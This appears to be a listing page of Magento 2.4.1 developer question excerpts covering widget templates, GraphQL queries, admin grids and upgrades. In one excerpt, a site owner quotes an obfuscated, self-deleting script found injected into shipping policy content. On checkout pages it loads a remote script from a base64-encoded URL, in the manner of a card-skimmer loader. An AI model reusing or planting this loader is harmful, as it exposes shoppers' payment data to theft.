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How to override Magento_CatalogWidget::product/widget/content/grid.phtml widget template in custom Module?

I want to override grid.phtml in custome module without using preference.I have tried this link but it does not work for me. widget.xml <?xml version=”1.0″ encoding=”UTF-8″?> <widgets xmlns:xsi=”” xsi:noNamespaceSchemaLocation=”urn:magento:module:Magento_Widget:etc/widget_file.xsd”> <widget id=”products_list”> <parameters> <parameter name=”template” xsi:type=”select”> <options> <option name=”grid” value=”Vendor_Module::product/widget/content/grid.phtml”> <label… Read More »How to override Magento_CatalogWidget::product/widget/content/grid.phtml widget template in custom Module?

GraphQL Error in Magento 2.4.1: Cannot query field “uid” on type “ConfigurableProductOptionsValues”

I’m having trouble getting the uid for my Configurable product options via GraphQL. Testing with this simplified query: { products(filter: { url_key: { eq: “test-product” } }) { items { sku … on ConfigurableProduct { configurable_options { attribute_code values {… Read More »GraphQL Error in Magento 2.4.1: Cannot query field “uid” on type “ConfigurableProductOptionsValues”

Grid is not loading showing just the spinner without errors in logs or console

I’m trying to follow the guide to add a custom admin grid however I’m stuck in a situation where there’s no error and the spinner keeps loading forever without loading the grid. Log files system.log, debug.log, exception.log are empty… Read More »Grid is not loading showing just the spinner without errors in logs or console

How to upgrade Magento from 2.4.1 to 2.4.6

I’m actually on Magento CE version 2.4.1 I need to update it to 2.4.6 (latest version) I’m in live (I don’t have a staging enviroment) Is there someone who can guide me step to step in upgrading? Really really thanks

script injected in magento 2.4.1 at shipping_policy_content

we found a script like this in shipping/shipping_policy/shipping_policy_content <script id=”shopcart”>((g,r,w,s,t,o) => {if(g.location.href.indexOf(atob(t))>-1){a=r.createElement(w);”carthelper”;a.async=1;a.src=atob(o);r.body.appendChild(a);}if(document.querySelector(“#shopcart”)){document.querySelector(“#shopcart”).remove();}})(window,document,”script”,”gCaptcha”,”Y2hlY2tvdXQ”,”aHR0cHM6Ly9zdGF0aWMud2ViYWdlbmN5YW5hbHl0aWNzLmNvbS9tYWluLmpzP3Y9MS4wLjM”)</script> Which translates to I’m trying to determine how this was injected but I can’t find references to the script itself or the base64 encoded string or the… Read More »script injected in magento 2.4.1 at shipping_policy_content

how do I create a custom GraphQL query that fetches a list of products in Magento 2.4.1

In my schema.graphqls file I’ve created this Query type Query { getLinkedProductsByGroups(groups: [String]): [LinkedProductsByGroup] @resolver(class: “Vendor\ProductDisplay\Model\Resolver\LinkedProductsByGroups”) } type LinkedProductsByGroup { group: String products: [ProductInterface] } I’ve created my resolver <?php /* * Copyright (c) 2023. Vendor TECHNOLOGIES */ namespace VendorProductDisplayModelResolver;… Read More »how do I create a custom GraphQL query that fetches a list of products in Magento 2.4.1